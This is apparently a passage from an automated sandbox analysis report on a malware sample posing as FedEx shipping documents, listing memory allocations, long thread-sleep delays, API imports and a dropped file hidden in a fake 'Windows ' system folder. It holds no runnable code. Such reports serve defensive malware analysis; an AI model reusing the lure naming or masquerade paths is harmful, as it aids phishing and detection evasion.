        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 3041000 memory commit 500154368Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 3066000 memory commit 500002816Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 3067000 memory commit 500068352Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 3077000 memory commit 501014528Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 316F000 memory commit 500006912Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 3170000 memory commit 500015104Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 2FA0000 memory commit 500068352
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 2FA1000 memory commit 500154368
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 2FC6000 memory commit 500002816
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 2FC7000 memory commit 500068352
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 2FD7000 memory commit 501014528
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 30CF000 memory commit 500006912
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFMemory allocated: 30D0000 memory commit 500015104
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeMemory allocated: 2D50000 memory commit 500068352Jump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeMemory allocated: 2D51000 memory commit 500154368Jump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeMemory allocated: 2D76000 memory commit 500002816Jump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeMemory allocated: 2D77000 memory commit 500068352Jump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeMemory allocated: 2D87000 memory commit 501014528Jump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeMemory allocated: 2E7F000 memory commit 500006912Jump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeMemory allocated: 2E80000 memory commit 500015104Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: 29390000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: 29710000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: 2B710000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: 25740000 memory reserve | memory write watch
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: 25C80000 memory reserve | memory write watch
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: 25B80000 memory reserve | memory write watch
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: 2A590000 memory reserve | memory write watch
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: 2A8C0000 memory reserve | memory write watch
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMemory allocated: 2C8C0000 memory reserve | memory write watch
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,7_2_004019F0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_3_2BDBEE1A sldt word ptr [eax]7_3_2BDBEE1A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599880Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599764Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599655Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599546Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599281Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599168Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599046Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598937Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598828Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598719Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598609Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598500Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598390Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598281Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598172Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598058Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597953Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597844Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597720Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597594Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597484Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597374Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597265Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597156Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597047Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596937Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596828Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596719Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596592Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596479Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596365Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596248Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596123Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596015Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595906Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595797Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595687Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595577Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595469Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595359Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595250Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595141Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595031Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594922Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594812Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594703Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594593Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594484Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594370Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594266Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 922337203685477
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 600000
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599874
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599764
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599655
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599547
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599436
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599327
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599217
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599109
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599000
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598888
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598781
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598671
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598535
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598406
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598295
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598175
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597641
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597468
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597360
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597249
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597137
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596954
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596848
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596720
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596595
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596468
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596334
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596134
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595995
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595865
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595713
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595576
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595368
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594569
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594312
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594155
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594000
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593842
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593708
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593582
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593460
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593351
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593241
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593132
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 593023
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592913
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592804
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592695
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592585
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592476
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592366
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592257
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592148
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 592014
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591896
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591763
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591617
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591483
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591381
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591257
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591147
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 591037
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 922337203685477
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 600000
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599875
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599765
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599656
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599547
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599435
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599271
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599155
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 599037
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598922
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598797
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598687
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598578
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598469
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598344
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598234
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598125
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 598016
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597906
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597797
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597687
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597578
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597469
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597359
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597249
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597140
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 597031
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596911
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596774
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596440
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596294
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596162
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 596033
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595913
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595812
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595703
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595593
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595480
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595375
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595266
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595156
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 595047
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594937
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594827
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594719
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594594
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594484
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594375
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594265
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifThread delayed: delay time: 594154
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow / User API: threadDelayed 2076Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow / User API: threadDelayed 7759Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow / User API: foregroundWindowGot 1585Jump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow / User API: threadDelayed 4296
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow / User API: threadDelayed 5488
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow / User API: foregroundWindowGot 1590
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow / User API: threadDelayed 5005
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow / User API: threadDelayed 4830
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifWindow / User API: foregroundWindowGot 1631
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeDropped PE file which has not been started: C:\Windows \SysWOW64\svchost.pifJump to dropped file
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -34126476536362649s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -599880s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -599764s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -599655s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -599546s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -599281s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -599168s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -599046s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -598937s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -598828s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -598719s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -598609s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -598500s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -598390s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -598281s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -598172s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -598058s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -597953s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -597844s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -597720s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -597594s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -597484s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -597374s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -597265s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -597156s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -597047s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -596937s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -596828s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -596719s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -596592s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -596479s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -596365s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -596248s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -596123s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -596015s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -595906s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -595797s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -595687s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -595577s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -595469s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -595359s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -595250s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -595141s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -595031s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -594922s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -594812s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -594703s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -594593s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -594484s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -594370s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816Thread sleep time: -594266s >= -30000sJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -35971150943733603s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -600000s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -599874s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -599764s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -599655s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -599547s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -599436s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -599327s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -599217s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -599109s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -599000s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -598888s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -598781s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -598671s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -598535s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -598406s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -598295s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -598175s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -597641s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -597468s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -597360s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -597249s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -597137s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -596954s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -596848s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -596720s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -596595s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -596468s >= -30000s
        Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096Thread sleep time: -596334s >= -30000s
